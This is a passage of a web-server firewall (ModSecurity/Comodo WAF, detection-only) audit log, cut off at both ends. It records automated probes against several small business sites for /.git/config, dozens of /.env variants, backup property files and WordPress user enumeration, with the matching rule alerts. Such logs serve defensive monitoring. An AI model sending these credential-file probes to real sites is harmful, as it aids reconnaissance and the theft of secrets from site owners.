(KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 --96aa1d38-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --96aa1d38-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "archangledesignstudio.com"] [uri "/.git/HEAD"] [unique_id "aE3Apyj1NB6R8D1b9l7EIAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926055643539 928505 (- - -) Stopwatch2: 1749926055643539 928505; combined=1610, p1=360, p2=1160, p3=0, p4=0, p5=90, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96aa1d38-Z-- --76dfa928-A-- [15/Jun/2025:00:04:18.178549 +0530] aE3AqUelxpbOl24z1sUfEgAAAAQ 182.253.238.235 49972 127.0.0.1 7081 --76dfa928-B-- GET /.git/config HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 182.253.238.235 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 --76dfa928-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --76dfa928-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "archangledesignstudio.com"] [uri "/.git/config"] [unique_id "aE3AqUelxpbOl24z1sUfEgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926057277584 901031 (- - -) Stopwatch2: 1749926057277584 901031; combined=1853, p1=340, p2=1421, p3=0, p4=0, p5=92, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --76dfa928-Z-- --d680d13c-A-- [15/Jun/2025:00:04:27.573683 +0530] aE3AsUelxpbOl24z1sUfFwAAAAQ 185.177.72.108 38832 127.0.0.1 7081 --d680d13c-B-- GET /application.properties.bak HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d680d13c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --d680d13c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/application.properties.bak"] [unique_id "aE3AsUelxpbOl24z1sUfFwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926065780277 1793506 (- - -) Stopwatch2: 1749926065780277 1793506; combined=2480, p1=424, p2=1976, p3=0, p4=0, p5=79, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d680d13c-Z-- --cde80a74-A-- [15/Jun/2025:00:19:15.717261 +0530] aE3EK5NmYD5NHp5bCdwnnwAAAAM 122.164.87.62 47858 127.0.0.1 7081 --cde80a74-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: www.thebrandwagon.in X-Real-IP: 122.164.87.62 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko --cde80a74-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.thebrandwagon.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Set-Cookie: _sfs_id=b262775bcea8508b411eafb94dfa823a1749926955; expires=Sat, 14 Jun 2025 19:49:15 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: application/json; charset=UTF-8 --cde80a74-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.thebrandwagon.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.thebrandwagon.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.thebrandwagon.in"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aE3EK5NmYD5NHp5bCdwnnwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/thebrandwagon.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926955490466 226872 (- - -) Stopwatch2: 1749926955490466 226872; combined=2097, p1=386, p2=1624, p3=0, p4=0, p5=87, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cde80a74-Z-- --147b0c12-A-- [15/Jun/2025:00:19:19.312527 +0530] aE3ELwJRo2m7zz_kJHfuqQAAAAk 78.153.140.218 58256 127.0.0.1 7080 --147b0c12-B-- GET /.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 --147b0c12-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --147b0c12-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env"] [unique_id "aE3ELwJRo2m7zz_kJHfuqQAAAAk"] Stopwatch: 1749926959309373 3208 (- - -) Stopwatch2: 1749926959309373 3208; combined=1872, p1=400, p2=1380, p3=0, p4=0, p5=92, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --147b0c12-Z-- --7332c21a-A-- [15/Jun/2025:00:19:22.410835 +0530] aE3EMublMrvfPBGDB2xDPgAAAAg 78.153.140.218 58288 127.0.0.1 7080 --7332c21a-B-- GET /backend/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 --7332c21a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --7332c21a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/backend/.env"] [unique_id "aE3EMublMrvfPBGDB2xDPgAAAAg"] Stopwatch: 1749926962407619 3271 (- - -) Stopwatch2: 1749926962407619 3271; combined=1882, p1=392, p2=1432, p3=0, p4=0, p5=58, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7332c21a-Z-- --5150af23-A-- [15/Jun/2025:00:19:22.899764 +0530] aE3EMpNmYD5NHp5bCdwnoQAAAAM 78.153.140.218 58302 127.0.0.1 7080 --5150af23-B-- GET /api/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.652.0 Safari/534.17 --5150af23-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --5150af23-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/api/.env"] [unique_id "aE3EMpNmYD5NHp5bCdwnoQAAAAM"] Stopwatch: 1749926962896135 3697 (- - -) Stopwatch2: 1749926962896135 3697; combined=2113, p1=511, p2=1535, p3=0, p4=0, p5=67, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5150af23-Z-- --28d2e276-A-- [15/Jun/2025:00:19:23.414391 +0530] aE3EM4QvQ5lW-c5YySCkPAAAAAc 78.153.140.218 58306 127.0.0.1 7080 --28d2e276-B-- GET /admin/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.5; en-gb; GT-I9100 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --28d2e276-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --28d2e276-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/admin/.env"] [unique_id "aE3EM4QvQ5lW-c5YySCkPAAAAAc"] Stopwatch: 1749926963410497 3961 (- - -) Stopwatch2: 1749926963410497 3961; combined=2294, p1=500, p2=1724, p3=0, p4=0, p5=70, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --28d2e276-Z-- --7e7a5d7c-A-- [15/Jun/2025:00:19:24.713180 +0530] aE3ENCj1NB6R8D1b9l7FWAAAAAE 78.153.140.218 58308 127.0.0.1 7080 --7e7a5d7c-B-- GET /app/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:24.0; Neustar WPM) Gecko/20100101 Firefox/24.0 --7e7a5d7c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --7e7a5d7c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/app/.env"] [unique_id "aE3ENCj1NB6R8D1b9l7FWAAAAAE"] Stopwatch: 1749926964709489 3758 (- - -) Stopwatch2: 1749926964709489 3758; combined=2084, p1=488, p2=1526, p3=0, p4=0, p5=70, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e7a5d7c-Z-- --ee310b2f-A-- [15/Jun/2025:00:19:25.442728 +0530] aE3ENeblMrvfPBGDB2xDPwAAAAg 78.153.140.218 58322 127.0.0.1 7080 --ee310b2f-B-- GET /vendor/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 --ee310b2f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ee310b2f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/vendor/.env"] [unique_id "aE3ENeblMrvfPBGDB2xDPwAAAAg"] Stopwatch: 1749926965439643 3151 (- - -) Stopwatch2: 1749926965439643 3151; combined=1813, p1=396, p2=1359, p3=0, p4=0, p5=58, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ee310b2f-Z-- --52f07659-A-- [15/Jun/2025:00:19:26.224864 +0530] aE3ENgQYZLZu4P5jJ0ijGAAAAAo 78.153.140.218 58338 127.0.0.1 7080 --52f07659-B-- GET /crm/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 --52f07659-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --52f07659-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/crm/.env"] [unique_id "aE3ENgQYZLZu4P5jJ0ijGAAAAAo"] Stopwatch: 1749926966221794 3124 (- - -) Stopwatch2: 1749926966221794 3124; combined=1799, p1=386, p2=1360, p3=0, p4=0, p5=53, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52f07659-Z-- --c3c42f63-A-- [15/Jun/2025:00:19:27.212094 +0530] aE3ENyj1NB6R8D1b9l7FWQAAAAE 78.153.140.218 58342 127.0.0.1 7080 --c3c42f63-B-- GET /.env.example HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 --c3c42f63-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c3c42f63-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.example"] [unique_id "aE3ENyj1NB6R8D1b9l7FWQAAAAE"] Stopwatch: 1749926967208123 4043 (- - -) Stopwatch2: 1749926967208123 4043; combined=2395, p1=496, p2=1829, p3=0, p4=0, p5=70, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3c42f63-Z-- --4212786f-A-- [15/Jun/2025:00:19:28.078103 +0530] aE3EOPgQcZu6vRSfy052OwAAAAI 78.153.140.218 58354 127.0.0.1 7080 --4212786f-B-- GET /.env.production HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1) Opera 5.02 [en] --4212786f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4212786f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.production"] [unique_id "aE3EOPgQcZu6vRSfy052OwAAAAI"] Stopwatch: 1749926968074288 3892 (- - -) Stopwatch2: 1749926968074288 3892; combined=2262, p1=518, p2=1666, p3=0, p4=0, p5=78, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4212786f-Z-- --6180c812-A-- [15/Jun/2025:00:19:29.940948 +0530] aE3EOQJRo2m7zz_kJHfurQAAAAk 78.153.140.218 54358 127.0.0.1 7080 --6180c812-B-- GET /media/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 5.05; Windows NT 3.51) --6180c812-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6180c812-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/media/.env"] [unique_id "aE3EOQJRo2m7zz_kJHfurQAAAAk"] Stopwatch: 1749926969937969 3032 (- - -) Stopwatch2: 1749926969937969 3032; combined=1825, p1=358, p2=1414, p3=0, p4=0, p5=53, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6180c812-Z-- --93bda576-A-- [15/Jun/2025:00:19:30.402748 +0530] aE3EOgQYZLZu4P5jJ0ijGgAAAAo 78.153.140.218 54362 127.0.0.1 7080 --93bda576-B-- GET /server/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.2.1; AT10LE-A Build/JOP40D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.136 Safari/537.36 --93bda576-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --93bda576-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/server/.env"] [unique_id "aE3EOgQYZLZu4P5jJ0ijGgAAAAo"] Stopwatch: 1749926970399902 2899 (- - -) Stopwatch2: 1749926970399902 2899; combined=1662, p1=397, p2=1211, p3=0, p4=0, p5=53, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --93bda576-Z-- --0c6e8633-A-- [15/Jun/2025:00:19:31.133963 +0530] aE3EO_7cRvnxskD-AFcUHAAAAAY 78.153.140.218 54368 127.0.0.1 7080 --0c6e8633-B-- GET /staging/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 --0c6e8633-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0c6e8633-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/staging/.env"] [unique_id "aE3EO_7cRvnxskD-AFcUHAAAAAY"] Stopwatch: 1749926971130671 3358 (- - -) Stopwatch2: 1749926971130671 3358; combined=1994, p1=430, p2=1506, p3=0, p4=0, p5=57, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c6e8633-Z-- --ae73bd09-A-- [15/Jun/2025:00:19:31.589371 +0530] aE3EO23GPR2TokqXa4ELUAAAAAA 78.153.140.218 54374 127.0.0.1 7080 --ae73bd09-B-- GET /twilio/.env HTTP/1.0 Host: 